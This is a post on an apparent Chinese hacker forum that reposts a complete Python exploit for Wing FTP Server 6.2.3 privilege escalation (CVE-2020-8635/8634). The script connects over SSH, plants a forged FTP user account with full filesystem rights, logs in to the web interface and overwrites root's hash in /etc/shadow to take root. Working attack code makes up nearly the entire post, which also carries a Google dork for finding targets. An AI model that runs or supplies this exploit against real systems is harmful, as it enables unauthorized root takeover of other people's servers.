• Welcome to the world's largest Chinese hacker forum

    Welcome to the world's largest Chinese hacker forum, our forum registration is open! You can now register for technical communication with us, this is a free and open to the world of the BBS, we founded the purpose for the study of network security, please don't release business of black/grey, or on the BBS posts, to seek help hacker if violations, we will permanently frozen your IP and account, thank you for your cooperation. Hacker attack and defense cracking or network Security

    business please click here: Creation Security  From CNHACKTEAM

Wing FTP Server 6.2.3-权限提升漏洞


This Wind

Recommended Posts

发布内容作者:Cary Hooper                                              漏洞危害等级:critlow_3.gif〔高〕

# Exploit Title: Wing FTP Server 6.2.3 - Privilege Escalation<font></font>
# Google Dork: intitle:"Wing FTP Server - Web"<font></font>
# Date: 2020-03-02<font></font>
# Exploit Author: Cary Hooper<font></font>
# Vendor Homepage: https://www.wftpserver.com<font></font>
# Software Link: https://www.wftpserver.com/download/wftpserver-linux-64bit.tar.gz<font></font>
# Version: v6.2.3<font></font>
# Tested on: Ubuntu 18.04, Kali Linux 4, MacOS Catalina, Solaris 11.4 (x86)<font></font>
<font></font>
<font></font>
# Given SSH access to a target machine with Wing FTP Server installed, this program:<font></font>
#       - SSH in, forges a FTP user account with full permissions (CVE-2020-8635)<font></font>
#       - Logs in to HTTP interface and then edits /etc/shadow (resulting in CVE-2020-8634)<font></font>
# Each step can all be done manually with any kind of code execution on target (no SSH)<font></font>
# To setup, start SSH service, then run ./wftpserver.  Wing FTP services will start after a domain is created.<font></font>
# https://www.hooperlabs.xyz/disclosures/cve-2020-8635.php (writeup)<font></font>
<font></font>
<font></font>
#!/usr/bin/python3<font></font>
<font></font>
#python3 cve-2020-8635.py -t 192.168.0.2:2222 -u lowleveluser -p demo --proxy http://127.0.0.1:8080<font></font>
<font></font>
import paramiko,sys,warnings,requests,re,time,argparse<font></font>
#Python warnings are the worst<font></font>
warnings.filterwarnings("ignore")<font></font>
<font></font>
#Argument handling begins<font></font>
parser = argparse.ArgumentParser(description="Exploit for Wing FTP Server v6.2.3 Local Privilege Escalation",epilog=print(f"Exploit by @nopantrootdance."))<font></font>
parser.add_argument("-t", "--target", help="hostname of target, optionally with port specified (hostname:port)",required=True)<font></font>
parser.add_argument("-u", "--username", help="SSH username", required=True)<font></font>
parser.add_argument("-p", "--password", help="SSH password", required=True)<font></font>
parser.add_argument("-v", "--verbose", help="Turn on debug information", action='store_true')<font></font>
parser.add_argument("--proxy", help="Send HTTP through a proxy",default=False)<font></font>
args = parser.parse_args()<font></font>
<font></font>
#Global Variables<font></font>
global username<font></font>
global password<font></font>
global proxies<font></font>
global port<font></font>
global hostname<font></font>
global DEBUG<font></font>
username = args.username<font></font>
password = args.password<font></font>
<font></font>
#Turn on debug statements<font></font>
if args.verbose:<font></font>
        DEBUG = True<font></font>
else:<font></font>
        DEBUG = False<font></font>
<font></font>
#Handle nonstandard SSH port<font></font>
if ':' in args.target:<font></font>
        socket = args.target.split(':')<font></font>
        hostname = socket[0]<font></font>
        port = socket[1]<font></font>
else:<font></font>
        hostname = args.target<font></font>
        port = "22"<font></font>
<font></font>
#Prepare proxy dict (for Python requests)<font></font>
if args.proxy:<font></font>
        if ("http://" not in args.proxy) and ("https://" not in args.proxy):<font></font>
                print(f"[!] Invalid proxy.  Proxy must have http:// or https:// {proxy}")<font></font>
                sys.exit(1)<font></font>
        proxies = {'http':args.proxy,'https':args.proxy}<font></font>
else:<font></font>
        proxies = {}<font></font>
#Argument handling ends<font></font>
<font></font>
#This is what a <username>.xml file looks like.<font></font>
#Gives full permission to user (h00p:h00p) for entire filesystem '/'.<font></font>
#Located in $_WFTPROOT/Data/Users/<font></font>
evilUserXML = """<?xml version="1.0" ?><font></font>
<USER_ACCOUNTS Description="Wing FTP Server User Accounts"><font></font>
    <USER><font></font>
        <UserName>h00p</UserName><font></font>
        <EnableAccount>1</EnableAccount><font></font>
        <EnablePassword>1</EnablePassword><font></font>
        <Password>d28f47c0483d392ca2713fe7e6f54089</Password><font></font>
        <ProtocolType>63</ProtocolType><font></font>
        <EnableExpire>0</EnableExpire><font></font>
        <ExpireTime>2020-02-25 18:27:07</ExpireTime><font></font>
        <MaxDownloadSpeedPerSession>0</MaxDownloadSpeedPerSession><font></font>
        <MaxUploadSpeedPerSession>0</MaxUploadSpeedPerSession><font></font>
        <MaxDownloadSpeedPerUser>0</MaxDownloadSpeedPerUser><font></font>
        <MaxUploadSpeedPerUser>0</MaxUploadSpeedPerUser><font></font>
        <SessionNoCommandTimeOut>5</SessionNoCommandTimeOut><font></font>
        <SessionNoTransferTimeOut>5</SessionNoTransferTimeOut><font></font>
        <MaxConnection>0</MaxConnection><font></font>
        <ConnectionPerIp>0</ConnectionPerIp><font></font>
        <PasswordLength>0</PasswordLength><font></font>
        <ShowHiddenFile>0</ShowHiddenFile><font></font>
        <CanChangePassword>0</CanChangePassword><font></font>
        <CanSendMessageToServer>0</CanSendMessageToServer><font></font>
        <EnableSSHPublicKeyAuth>0</EnableSSHPublicKeyAuth><font></font>
        <SSHPublicKeyPath></SSHPublicKeyPath><font></font>
        <SSHAuthMethod>0</SSHAuthMethod><font></font>
        <EnableWeblink>1</EnableWeblink><font></font>
        <EnableUplink>1</EnableUplink><font></font>
        <CurrentCredit>0</CurrentCredit><font></font>
        <RatioDownload>1</RatioDownload><font></font>
        <RatioUpload>1</RatioUpload><font></font>
        <RatioCountMethod>0</RatioCountMethod><font></font>
        <EnableRatio>0</EnableRatio><font></font>
        <MaxQuota>0</MaxQuota><font></font>
        <CurrentQuota>0</CurrentQuota><font></font>
        <EnableQuota>0</EnableQuota><font></font>
        <NotesName></NotesName><font></font>
        <NotesAddress></NotesAddress><font></font>
        <NotesZipCode></NotesZipCode><font></font>
        <NotesPhone></NotesPhone><font></font>
        <NotesFax></NotesFax><font></font>
        <NotesEmail></NotesEmail><font></font>
        <NotesMemo></NotesMemo><font></font>
        <EnableUploadLimit>0</EnableUploadLimit><font></font>
        <CurLimitUploadSize>0</CurLimitUploadSize><font></font>
        <MaxLimitUploadSize>0</MaxLimitUploadSize><font></font>
        <EnableDownloadLimit>0</EnableDownloadLimit><font></font>
        <CurLimitDownloadLimit>0</CurLimitDownloadLimit><font></font>
        <MaxLimitDownloadLimit>0</MaxLimitDownloadLimit><font></font>
        <LimitResetType>0</LimitResetType><font></font>
        <LimitResetTime>1580092048</LimitResetTime><font></font>
        <TotalReceivedBytes>0</TotalReceivedBytes><font></font>
        <TotalSentBytes>0</TotalSentBytes><font></font>
        <LoginCount>0</LoginCount><font></font>
        <FileDownload>0</FileDownload><font></font>
        <FileUpload>0</FileUpload><font></font>
        <FailedDownload>0</FailedDownload><font></font>
        <FailedUpload>0</FailedUpload><font></font>
        <LastLoginIp></LastLoginIp><font></font>
        <LastLoginTime>2020-01-26 18:27:28</LastLoginTime><font></font>
        <EnableSchedule>0</EnableSchedule><font></font>
        <Folder><font></font>
            <Path>/</Path><font></font>
            <Alias>/</Alias><font></font>
            <Home_Dir>1</Home_Dir><font></font>
            <File_Read>1</File_Read><font></font>
            <File_Write>1</File_Write><font></font>
            <File_Append>1</File_Append><font></font>
            <File_Delete>1</File_Delete><font></font>
            <Directory_List>1</Directory_List><font></font>
            <Directory_Rename>1</Directory_Rename><font></font>
            <Directory_Make>1</Directory_Make><font></font>
            <Directory_Delete>1</Directory_Delete><font></font>
            <File_Rename>1</File_Rename><font></font>
            <Zip_File>1</Zip_File><font></font>
            <Unzip_File>1</Unzip_File><font></font>
        </Folder><font></font>
    </USER><font></font>
</USER_ACCOUNTS><font></font>
"""<font></font>
<font></font>
#Verbosity function.  <font></font>
def log(string):<font></font>
        if DEBUG != False:<font></font>
                print(string)<font></font>
<font></font>
#Checks to see which URL is hosting Wing FTP<font></font>
#Returns a URL, probably. HTTPS preferred.  empty url is checked in main()<font></font>
def checkHTTP(hostname):<font></font>
        protocols= ["http://","https://"]<font></font>
        for protocol in protocols:<font></font>
                try:<font></font>
                        log(f"Testing HTTP service {protocol}{hostname}")<font></font>
                        response = requests.get(protocol + hostname, verify=False, proxies=proxies)<font></font>
                        try:<font></font>
                                #Server: Wing FTP Server<font></font>
                                if "Wing FTP Server" in response.headers['Server']:<font></font>
                                        print(f"[!] Wing FTP Server found at {protocol}{hostname}")<font></font>
                                        url = protocol + hostname<font></font>
                        except:<font></font>
                                print("")<font></font>
                except Exception as e:<font></font>
                        print(f"[*] Server is not running Wing FTP web services on {protocol}: {e}")<font></font>
        return url<font></font>
<font></font>
#Log in to the HTTP interface.  Returns cookie<font></font>
def getCookie(url,webuser,webpass,headers):<font></font>
        log("getCookie")<font></font>
        loginURL = f"{url}/loginok.html"<font></font>
        data = {"username": webuser, "password": webpass, "username_val": webuser, "remember": "true", "password_val": webpass, "submit_btn": " Login "}<font></font>
        response = requests.post(loginURL, headers=headers, data=data, verify=False, proxies=proxies)<font></font>
        ftpCookie = response.headers['Set-Cookie'].split(';')[0]<font></font>
        print(f"[!] Successfully logged in!  Cookie is {ftpCookie}")<font></font>
        cookies = {"UID":ftpCookie.split('=')[1]}<font></font>
        log("return getCookie")<font></font>
        return cookies<font></font>
<font></font>
#Change directory within the web interface.<font></font>
#The actual POST request changes state.  We keep track of that state in the returned directorymem array.<font></font>
def chDir(url,directory,headers,cookies,directorymem):<font></font>
        log("chDir")<font></font>
        data = {"dir": directory}<font></font>
        print(f"[*] Changing directory to {directory}")<font></font>
        chdirURL = f"{url}/chdir.html"<font></font>
        requests.post(chdirURL, headers=headers, cookies=cookies, data=data, verify=False, proxies=proxies)<font></font>
        log(f"Directorymem is nonempty. --> {directorymem}")<font></font>
        log("return chDir")<font></font>
        directorymem = directorymem + "|" + directory<font></font>
        return directorymem <font></font>
<font></font>
#The application has a silly way of keeping track of paths.<font></font>
#This function returns the current path as dirstring.<font></font>
def prepareStupidDirectoryString(directorymem,delimiter):<font></font>
        log("prepareStupidDirectoryString")<font></font>
        dirstring = ""<font></font>
        directoryarray = directorymem.split('|')<font></font>
        log(f"directoryarray is {directoryarray}")<font></font>
        for item in directoryarray:<font></font>
                if item != "":<font></font>
                        dirstring += delimiter + item<font></font>
        log("return prepareStupidDirectoryString")<font></font>
        return dirstring<font></font>
<font></font>
#Downloads a given file from the server.  By default, it runs as root.<font></font>
#Returns the content of the file as a string.<font></font>
def downloadFile(file,url,headers,cookies,directorymem):<font></font>
        log("downloadFile")<font></font>
        print(f"[*] Downloading the {file} file...")<font></font>
        dirstring = prepareStupidDirectoryString(directorymem,"$2f")  #Why wouldn't you URL-encode?!<font></font>
        log(f"directorymem is {directorymem} and dirstring is {dirstring}")<font></font>
        editURL = f"{url}/editor.html?dir={dirstring}&filename={file}&r=0.88304407485768"<font></font>
        response = requests.get(editURL, cookies=cookies, verify=False, proxies=proxies)<font></font>
        filecontent = re.findall(r'<textarea id="textedit" style="height:520px; width:100%;">(.*?)</textarea>',response.text,re.DOTALL)[0]<font></font>
        log(f"downloaded file is: {filecontent}")<font></font>
        log("return downloadFile")<font></font>
        return filecontent,editURL<font></font>
<font></font>
#Saves a given file to the server (or overwrites one).  By default it saves a file with<font></font>
#644 permission owned by root.<font></font>
def saveFile(newfilecontent,file,url,headers,cookies,referer,directorymem):<font></font>
        log("saveFile")<font></font>
        log(f"Directorymem is {directorymem}")<font></font>
        saveURL = f"{url}/savefile.html"<font></font>
        headers = {"Content-Type": "text/plain;charset=UTF-8", "Referer": referer}<font></font>
        dirstring = prepareStupidDirectoryString(directorymem,"/")<font></font>
        log(f"Stupid Directory string is {dirstring}")<font></font>
        data = {"charcode": "0", "dir": dirstring, "filename": file, "filecontent": newfilecontent}<font></font>
        requests.post(saveURL, headers=headers, cookies=cookies, data=data, verify=False)<font></font>
        log("return saveFile")<font></font>
<font></font>
#Other methods may be more stable, but this works.<font></font>
#"You can't argue with a root shell" - FX<font></font>
#Let me know if you know of other ways to increase privilege by overwriting or creating files.  Another way is to overwrite<font></font>
#the Wing FTP admin file, then leverage the lua interpreter in the administrative interface which runs as root (YMMV).<font></font>
#Mind that in this version of Wing FTP, files will be saved with umask 111.  This makes changing /etc/sudoers infeasible.<font></font>
<font></font>
#This routine overwrites the shadow file<font></font>
def overwriteShadow(url):<font></font>
        log("overwriteShadow")<font></font>
        headers = {"Content-Type": "application/x-www-form-urlencoded"}<font></font>
        #Grab cookie from server.<font></font>
        cookies = getCookie(url=url,webuser="h00p",webpass="h00p",headers=headers)<font></font>
<font></font>
        #Chdir a few times, starting in the user's home directory until we arrive at the target folder<font></font>
        directorymem = chDir(url=url,directory="etc",headers=headers,cookies=cookies,directorymem="")<font></font>
        <font></font>
        #Download the target file.<font></font>
        shadowfile,referer = downloadFile(file="shadow",url=url,headers=headers,cookies=cookies,directorymem=directorymem)<font></font>
<font></font>
        # openssl passwd -1 -salt h00ph00p h00ph00p<font></font>
        rootpass = "$1$h00ph00p$0cUgaHnnAEvQcbS6PCMVM0"<font></font>
        rootpass = "root:" + rootpass + ":18273:0:99999:7:::"<font></font>
<font></font>
        #Create new shadow file with different root password & save<font></font>
        newshadow = re.sub("root(.*):::",rootpass,shadowfile)<font></font>
        print("[*] Swapped the password hash...")<font></font>
        saveFile(newfilecontent=newshadow,file="shadow",url=url,headers=headers,cookies=cookies,referer=referer,directorymem=directorymem)<font></font>
        print("[*] Saved the forged shadow file...")<font></font>
        log("exit overwriteShadow")<font></font>
<font></font>
def main():<font></font>
        log("main")<font></font>
        try:<font></font>
                #Create ssh connection to target with paramiko<font></font>
                client = paramiko.SSHClient()<font></font>
                client.load_system_host_keys()<font></font>
                client.set_missing_host_key_policy(paramiko.WarningPolicy)<font></font>
                try: <font></font>
                        client.connect(hostname, port=port, username=username, password=password)<font></font>
                except:<font></font>
                        print(f"Failed to connect to {hostname}:{port} as user {username}.")<font></font>
                <font></font>
                #Find wftpserver directory<font></font>
                print(f"[*] Searching for Wing FTP root directory. (this may take a few seconds...)")<font></font>
                stdin, stdout, stderr = client.exec_command("find / -type f -name 'wftpserver'")<font></font>
                wftpDir = stdout.read().decode("utf-8").split('\n')[0].rsplit('/',1)[0]<font></font>
                print(f"[!] Found Wing FTP directory: {wftpDir}")<font></font>
                #Find name of <domain><font></font>
                stdin, stdout, stderr = client.exec_command(f"find {wftpDir}/Data/ -type d -maxdepth 1")<font></font>
                lsresult = stdout.read().decode("utf-8").split('\n')<font></font>
                #Checking if wftpserver is actually configured.  If you're using this script, it probably is.<font></font>
                print(f"[*] Determining if the server has been configured.")<font></font>
                domains = []<font></font>
                for item in lsresult[:-1]:<font></font>
                        item = item.rsplit('/',1)[1]<font></font>
                        if item !="_ADMINISTRATOR" and item != "":<font></font>
                                domains.append(item)<font></font>
                                print(f"[!] Success. {len(domains)} domain(s) found! Choosing the first: {item}")<font></font>
                domain = domains[0]<font></font>
                #Check if the users folder exists<font></font>
                userpath = wftpDir + "/Data/" + domain<font></font>
                print(f"[*] Checking if users exist.")<font></font>
                stdin, stdout, stderr = client.exec_command(f"file {userpath}/users")<font></font>
                if "No such file or directory" in stdout.read().decode("utf-8"):<font></font>
                        print(f"[*] Users directory does not exist.  Creating folder /users")<font></font>
                        #Create users folder<font></font>
                        stdin, stdout, stderr = client.exec_command(f"mkdir {userpath}/users")<font></font>
                #Create user.xml file<font></font>
                print("[*] Forging evil user (h00p:h00p).")<font></font>
                stdin, stdout, stderr = client.exec_command(f"echo '{evilUserXML}' > {userpath}/users/h00p.xml")<font></font>
                #Now we can log into the FTP web app with h00p:h00p<font></font>
                <font></font>
                url = checkHTTP(hostname)<font></font>
                #Check that url isn't an empty string (and that its a valid URL)<font></font>
                if "http" not in url:<font></font>
                        print(f"[!] Exiting... cannot access web interface.")<font></font>
                        sys.exit(1)<font></font>
<font></font>
                #overwrite root password<font></font>
                try:<font></font>
                        overwriteShadow(url)<font></font>
                        print(f"[!] Overwrote root password to h00ph00p.")<font></font>
                except Exception as e:<font></font>
                        print(f"[!] Error: cannot overwrite /etc/shadow: {e}")<font></font>
<font></font>
                #Check to make sure the exploit worked.<font></font>
                stdin, stdout, stderr = client.exec_command("cat /etc/shadow | grep root")<font></font>
                out = stdout.read().decode('utf-8')<font></font>
                err = stderr.read().decode('utf-8')<font></font>
<font></font>
                log(f"STDOUT - {out}")<font></font>
                log(f"STDERR - {err}")<font></font>
                if "root:$1$h00p" in out:<font></font>
                        print(f"[*] Success!  The root password has been successfully changed.")<font></font>
                        print(f"\n\tssh {username}@{hostname} -p{port}")<font></font>
                        print(f"\tThen: su root (password is h00ph00p)")<font></font>
                else:<font></font>
                        print(f"[!] Something went wrong... SSH in to manually check /etc/shadow.  Permissions may have been changed to 666.")<font></font>
<font></font>
                log("exit prepareServer")<font></font>
        finally:<font></font>
                client.close()<font></font>
<font></font>
main()<font></font>
<font></font>
# [2020-03-20]  #

 

Link to comment
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now